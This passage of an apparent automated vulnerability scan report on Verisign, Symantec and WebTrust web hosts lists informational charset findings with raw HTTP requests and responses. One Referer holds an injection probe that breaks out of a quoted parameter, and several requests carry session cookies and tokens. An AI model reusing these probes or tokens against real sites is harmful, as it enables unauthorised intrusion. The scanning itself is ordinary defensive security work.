HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 4102 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
21.73. https://www.verisign.com/products-services/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/products-services/index.html
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]...
22. HTML does not specify charset
There are 63 instances of this issue:
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters. In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/assets/fonts/samd____-webfont.woff
Request
GET /assets/fonts/samd____-webfont.woff HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Server: Apache ETag: "2ef819b-7544-4a59eedb01b80" Accept-Ranges: bytes Content-Type: text/html Age: 3152 Date: Fri, 09 Sep 2011 21:27:10 GMT Last-Modified: Mon, 13 Jun 2011 21:51:58 GMT Expires: Sun, 09 Oct 2011 13:52:54 GMT Content-Length: 30020 Connection: keep-alive wOFF......uD................................FFTM............\...GDEF........... ....GPOS..........7&[0{.GSUB.......,...0....OS/2.......R...`x..fcmap...D...r....y0..cvt .......2...2 o..fpgm...........e...[SNIP]...
22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/authweb/en_ch/assets/shared/js/google-analytics.js
Request
GET /authweb/en_ch/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Content-Type: text/html Vary: Accept-Encoding Age: 27500 Date: Fri, 09 Sep 2011 21:25:03 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 460 Connection: keep-alive var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.ch']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scri...[SNIP]...
22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Content-Type: text/html Vary: Accept-Encoding Age: 73854 Date: Fri, 09 Sep 2011 21:25:44 GMT Expires: Sun, 09 Oct 2011 18:24:34 GMT Content-Length: 1356 Connection: keep-alive /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/shared.js
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Content-Type: text/html Vary: Accept-Encoding Age: 69510 Date: Fri, 09 Sep 2011 21:24:45 GMT Expires: Sun, 09 Oct 2011 05:58:30 GMT Content-Length: 37327 Connection: keep-alive // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/en_us/assets/shared/js/google-analytics.js
Request
GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69191 Expires: Sun, 09 Oct 2011 02:25:41 GMT Content-Length: 461 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scr...[SNIP]...
22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 1558 /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 14 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/home/js/home.js
Request
GET /authweb/global/assets/home/js/home.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 16 Expires: Sun, 09 Oct 2011 21:38:32 GMT Content-Length: 2725 /******************************************* ** HP specific functions ** *******************************************/ //External link functionality $('a[rel="external"]').click(funct...[SNIP]...
22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/global-preload.js
Request
GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69230 Expires: Sun, 09 Oct 2011 02:24:38 GMT Content-Length: 135518 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the M...[SNIP]...
22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/google-analytics.js
Request
GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 471 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElemen...[SNIP]...
22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.boxshadow.js
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:27 GMT Content-Length: 1538 /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 1 Expires: Sun, 09 Oct 2011 21:38:26 GMT Content-Length: 1356 /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/oo-engine.js
Request
GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 1154 /* OnlineOpinion (S3tS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,...[SNIP]...
22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 77341 Expires: Sun, 09 Oct 2011 00:09:34 GMT Content-Length: 4102 var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/shared.js
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:29 GMT Content-Length: 37327 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
22.18. https://cert.webtrust.org/ViewSeal
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/ViewSeal
Request
GET /ViewSeal HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:30 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: close Content-Type: text/html Content-Length: 2834 java.lang.NumberFormatException: null at java.lang.Integer.parseInt(Integer.java:394) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29) ...[SNIP]...
22.19. https://enterprise-ssl-admin.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://enterprise-ssl-admin.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: enterprise-ssl-admin.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:41:53 GMT Content-length: 1304 Content-type: text/html Connection: close <HTML> <HEAD> <TITLE>HTTP 403 Forbidden: Invalid Certificate for Client Authentication</TITLE> <link href="../stylesheet.css" rel="stylesheet" type="text/css" /> </HEAD> <BODY> <table width=720 bord...[SNIP]...
22.20. https://fileconnect.symantec.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:04:07 GMT Content-length: 11587 Content-type: text/html Content-Language: en-US <HTML><HEAD><TITLE>Symantec FileConnect - Electronic Software Distribution</TITLE> <!--[if IE]> <LINK REL=StyleSheet HREF="javascript/stylesie.css" TYPE="text/css" MEDIA=screen> <![endif]...[SNIP]...
22.21. https://fileconnect.symantec.com/favicon.ico
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/favicon.ico
Request
GET /favicon.ico HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451
Response
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:04:04 GMT Content-length: 1214 Content-type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He...[SNIP]...
22.22. https://fileconnect.symantec.com/javascript/common.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/common.js
Request
GET /javascript/common.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; 